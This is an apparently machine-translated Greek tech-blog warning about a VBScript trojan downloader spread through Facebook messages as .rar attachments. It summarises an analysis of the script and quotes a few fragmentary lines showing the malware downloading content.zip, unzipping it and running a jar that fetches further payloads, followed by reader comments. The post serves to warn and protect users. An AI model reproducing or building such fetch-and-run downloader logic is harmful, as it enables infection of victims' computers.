A message from a friend told us about a new threat (Trojan) is on Facebook. Using the social messaging service, scammers try to make trjjans to unsuspecting users.
Our friend from safer-internet.gr, sent us two different images from Facebook messages. The messages say something like "see this and don't tell anyone" and contain two .rar files with different names:
We asked for the files to analyze them and of course did not contain anything to look at. Although both rar had a different name executable file they contained was exactly the same (same CRC Checksum.)
and his name: Watch This !!! vbs
Executable files were a form .vbs. vbscript is a language scripting (script as they translate it) and comes with Windows. With it you can do various useful things, as you have seen from it category Tweaks iGuRu.gr, but you can also write trøjans.
The script that contained 2 rar had the TrojanDownloader.Agent.NJV trjan that has indexed from ESET on 11 February of 2012.
What Makes a Trojan Downloader?
A Trojan downloader with the running on the victim's computer seeks access to a remote computer to download files that he then installs on the infected computer.
This particular Trojan, TrojanDownloader.Agent.NJV trojan, is old and so it's immediately recognizable by antivirus, of course, if you've updated it.
Needless to tell you that you do not open zip files, rar you do not expect them and come to you, even if you know who sent it to you.
If you have already run the file and it has not "hit" the antivirus you are using, change or update the application security you.
Update:
While malicious messages are still coming to Facebook. we decided to open the script for further analysis.
All malicious links seem to be leading to the same server that has apparently been tampered with.
See 3 from the domains
The iGuRu.gr team informed the server owner about the necessary steps.
All malicious addresses are included in the photo below as they appear in the script
We believe that the malicious user is Greek as there are malicious files with Greek names, such as. /vasika/kalisperasas.zip. Also the folder that it does to download the malicious files is named by the malicious user "\ MyFolderakis."
After installation, make the above folder on the victim's computer, download the content.zip that contains one. jar file.
download (csPATH)
Unzip csPATH & ”\content.zip“, CsPATH
Loop While ReportFileStatus (csPATH & ”\sapsalo.jar
Once it downloads the content.zip and runs the jar (while the vbs script only runs on Windows, the jar runs on Windows. Mac and Linux) it starts downloading all the other malicious files, from the links we provided above.
Beware, as we did not download the above files and we do not know what they are.
iGuru_gr patrik31thanks for the prompt reply
patrik31 not because vbs only runs on Windows
patrik31
dimitrios1988 marikijohn3ok euxaristw polu pantws;)